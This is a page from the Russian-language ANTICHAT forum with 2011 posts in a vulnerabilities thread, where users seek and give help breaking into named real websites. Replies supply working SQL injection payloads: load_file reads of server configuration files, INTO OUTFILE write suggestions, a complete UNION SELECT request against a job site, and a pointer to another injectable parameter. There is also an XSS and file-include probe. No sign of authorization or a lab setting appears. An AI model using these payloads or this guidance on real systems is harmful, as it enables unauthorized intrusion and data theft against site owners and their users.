HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #16271  
Старый 04.02.2011, 14:31
Seravin
Участник форума
Регистрация: 25.11.2009
Сообщений: 201
Провел на форуме:
866555

Репутация: 226
По умолчанию

это просто читалка файлов насколько мне известно

http://dev.mysql.com/doc/refman/5.0/en/string-functions.html#function_load-file
 
Ответить с цитированием

  #16272  
Старый 04.02.2011, 20:14
kamaz
Познающий
Регистрация: 31.01.2007
Сообщений: 88
Провел на форуме:
631013

Репутация: 453
Отправить сообщение для kamaz с помощью ICQ
По умолчанию

Цитата:
Сообщение от noviyuser  
noviyuser said:
Текст отображается но только начало а потом обрывается как можно весь текст конфигурационного файла посмотреть???
Для просмотра файлов при ограничении вывода можно использовать запрос вида

Код:
Code:
select substring(load_file('/patch/to/file/file.conf'),1,100)
Где первая цифра - символ, с которого начинать вывод, вторая - количество выводимых символов

Цитата:
Сообщение от noviyuser  
noviyuser said:
Можно ли через Load_file сделать ls -la? для просмотра папок или нужна другая комманда?
Просматривать содержимое каталогов через load_file можно только, если сервер стоит на FreeBSD. В других случаях это невозможно. Выполнять какие-то ни было команды через load_file также невозможно.
 
Ответить с цитированием

  #16273  
Старый 04.02.2011, 23:41
fl00der
Постоянный
Регистрация: 17.12.2008
Сообщений: 353
Провел на форуме:
919131

Репутация: 74
По умолчанию

Если работает лоадфайл, попробуй записать через INTO OUTFILE, если знаешь полный путь и есть куда записать (путь можно узнать, читая конфиг Апача, если найдешь).
 
Ответить с цитированием

  #16274  
Старый 04.02.2011, 23:43
Seravin
Участник форума
Регистрация: 25.11.2009
Сообщений: 201
Провел на форуме:
866555

Репутация: 226
По умолчанию

т.к. он мне написал что пришлось захексить(насколько я понял), то into+outfile не прокатит
 
Ответить с цитированием

  #16275  
Старый 04.02.2011, 23:54
fl00der
Постоянный
Регистрация: 17.12.2008
Сообщений: 353
Провел на форуме:
919131

Репутация: 74
По умолчанию

Цитата:
Сообщение от Seravin  
Seravin said:
т.к. он мне написал что пришлось захексить(насколько я понял), то into+outfile не прокатит
Хз, я не заметил это че-то, либо он это тебе в ПМ написал.

Тогда конечно.
 
Ответить с цитированием

  #16276  
Старый 05.02.2011, 01:03
killrok6
Guest
Сообщений: n/a
Провел на форуме:
10390

Репутация: 0
По умолчанию

Нашел на одном сайте уязвимость, но при вставлении ковычки он выводит код на белом фоне :

т.е SELECT * FROM subgrp WHERE sts = 1 and grp = 5\'

На сайте: http://autolv.com/index.php?grp_id=3'

Что делать?

И вот недавно наткнулся на одном сайте было что подобрал поля, но не где не выводиться инфа

http://asg.lv/index.php?mlng=5&mmen_id=4+union+select+1,2,3,4,5, 6,7,8,9,10,11

Почему?

Заранее Спасибо
 
Ответить с цитированием

  #16277  
Старый 05.02.2011, 01:51
kamaz
Познающий
Регистрация: 31.01.2007
Сообщений: 88
Провел на форуме:
631013

Репутация: 453
Отправить сообщение для kamaz с помощью ICQ
По умолчанию

Цитата:
Сообщение от killrok6  
killrok6 said:
Нашел на одном сайте уязвимость, но при вставлении ковычки он выводит код на белом фоне :
т.е SELECT * FROM subgrp WHERE sts = 1 and grp = 5\'
На сайте: http://autolv.com/index.php?grp_id=3'
Что делать?
Логично же - не вставлять кавычку

И в этом конкретном примере вывод получить не удастся из-за двух запросов, выполняющихся подряд:

Код:
Code:
SELECT * FROM grp_des WHERE type = 'mgr' and grp_id =6 and lang='lang2'
Код:
Code:
SELECT * FROM subgrp WHERE sts = 1 and grp = 6
Успешно можно раскрутить скулю вот тут, например:

Код:
Code:
http://autolv.com/index.php?item_id=52
Цитата:
Сообщение от killrok6  
killrok6 said:
И вот недавно наткнулся на одном сайте было что подобрал поля, но не где не выводиться инфа
http://asg.lv/index.php?mlng=5&mmen_id=4+union+select+1,2,3,4,5, 6,7,8,9,10,11
Почему?
Я думаю оно работает так:

Представим 2 запроса.

Причем один из них фильтруется, а второй нет.

В оба запроса передается один и тот же параметр

Результаты первого запроса выводятся на экран, а второго - нет.

Поэтому мы можем подобрать количество полей.

Но вывод получить не удастся.

Хотя есть некая странность, и

Код:
Code:
mmen_id=4-2
работает, при условии, что

Код:
Code:
mmen_id=if(1,2,3)
работать отказывается. Этого я объяснить не могу(
 
Ответить с цитированием

  #16278  
Старый 05.02.2011, 13:29
ubi
Новичок
Регистрация: 25.12.2009
Сообщений: 18
Провел на форуме:
278340

Репутация: 0
По умолчанию

Прошу помощи

http://stomjob.ru/index.php?sub=search_vacbyid

В поле ID вакансии подставляем '

Получаем Error You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'' at line 1

Помогите подобрать поля
 
Ответить с цитированием

  #16279  
Старый 05.02.2011, 14:25
Zalepoks
Guest
Сообщений: n/a
Провел на форуме:
1289

Репутация: 0
По умолчанию

Код:
Code:
http://ontarioworld.ru/usercp/store/prem.php?p=javajavascriptscript:alert%28%20String.fromCharCode%28120,115,115%29%29
Цитата:
Сообщение от None  
Warning: include_once(config.php) [function.include-once]: failed to open stream: No such file or directory in /www/ontariow/www/htdocs/usercp/store/prem.php on line 2 Warning: include_once() [function.include]: Failed opening 'config.php' for inclusion (include_path='.:/usr/lib/php:/usr/local/lib/php') in /www/ontariow/www/htdocs/usercp/store/prem.php on line 2 Warning: session_start() [function.session-start]: Cannot send session cache limiter - headers already sent (output started at /www/ontariow/www/htdocs/usercp/store/prem.php:2) in /www/ontariow/www/htdocs/usercp/store/prem.php on line 3 Fatal error: Call to undefined function sql() in /www/ontariow/www/htdocs/usercp/store/prem.php on line 4
Может мне ктонить разяснить, что сделать здесь дальше ?
 
Ответить с цитированием

  #16280  
Старый 05.02.2011, 15:35
kamaz
Познающий
Регистрация: 31.01.2007
Сообщений: 88
Провел на форуме:
631013

Репутация: 453
Отправить сообщение для kamaz с помощью ICQ
По умолчанию

Цитата:
Сообщение от ubi  
ubi said:
Прошу помощи
http://stomjob.ru/index.php?sub=search_vacbyid
В поле ID вакансии подставляем '
Получаем Error You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'' at line 1
Помогите подобрать поля
http://stomjob.ru/index.php?sub=show_vacancybyid

POST:

Код:
Code:
vacby_id=1 union select 1,version(),3,4,5,6,7,8,9,0,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26-- 1
Либо можно вбить

Код:
Code:
1 union select 1,version(),3,4,5,6,7,8,9,0,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26-- 1
В поле поиска вакансии

Цитата:
Сообщение от None  
Код:
Code:
http://ontarioworld.ru/usercp/store/prem.php?p=javajavascriptscript:alert%28%20String. fromCharCode%28120,115,115%29%29
Может мне ктонить разяснить, что сделать здесь дальше ?
При этом запросе надо посмотреть внимательно на ошибку:

Код:
Code:
Warning: include_once(store/javajavascriptscript:alert(String.fromCharCode(120,115,115)).php
Где текст ошибки говорит сам за себя.
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Уязвимости CMS / форумов 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ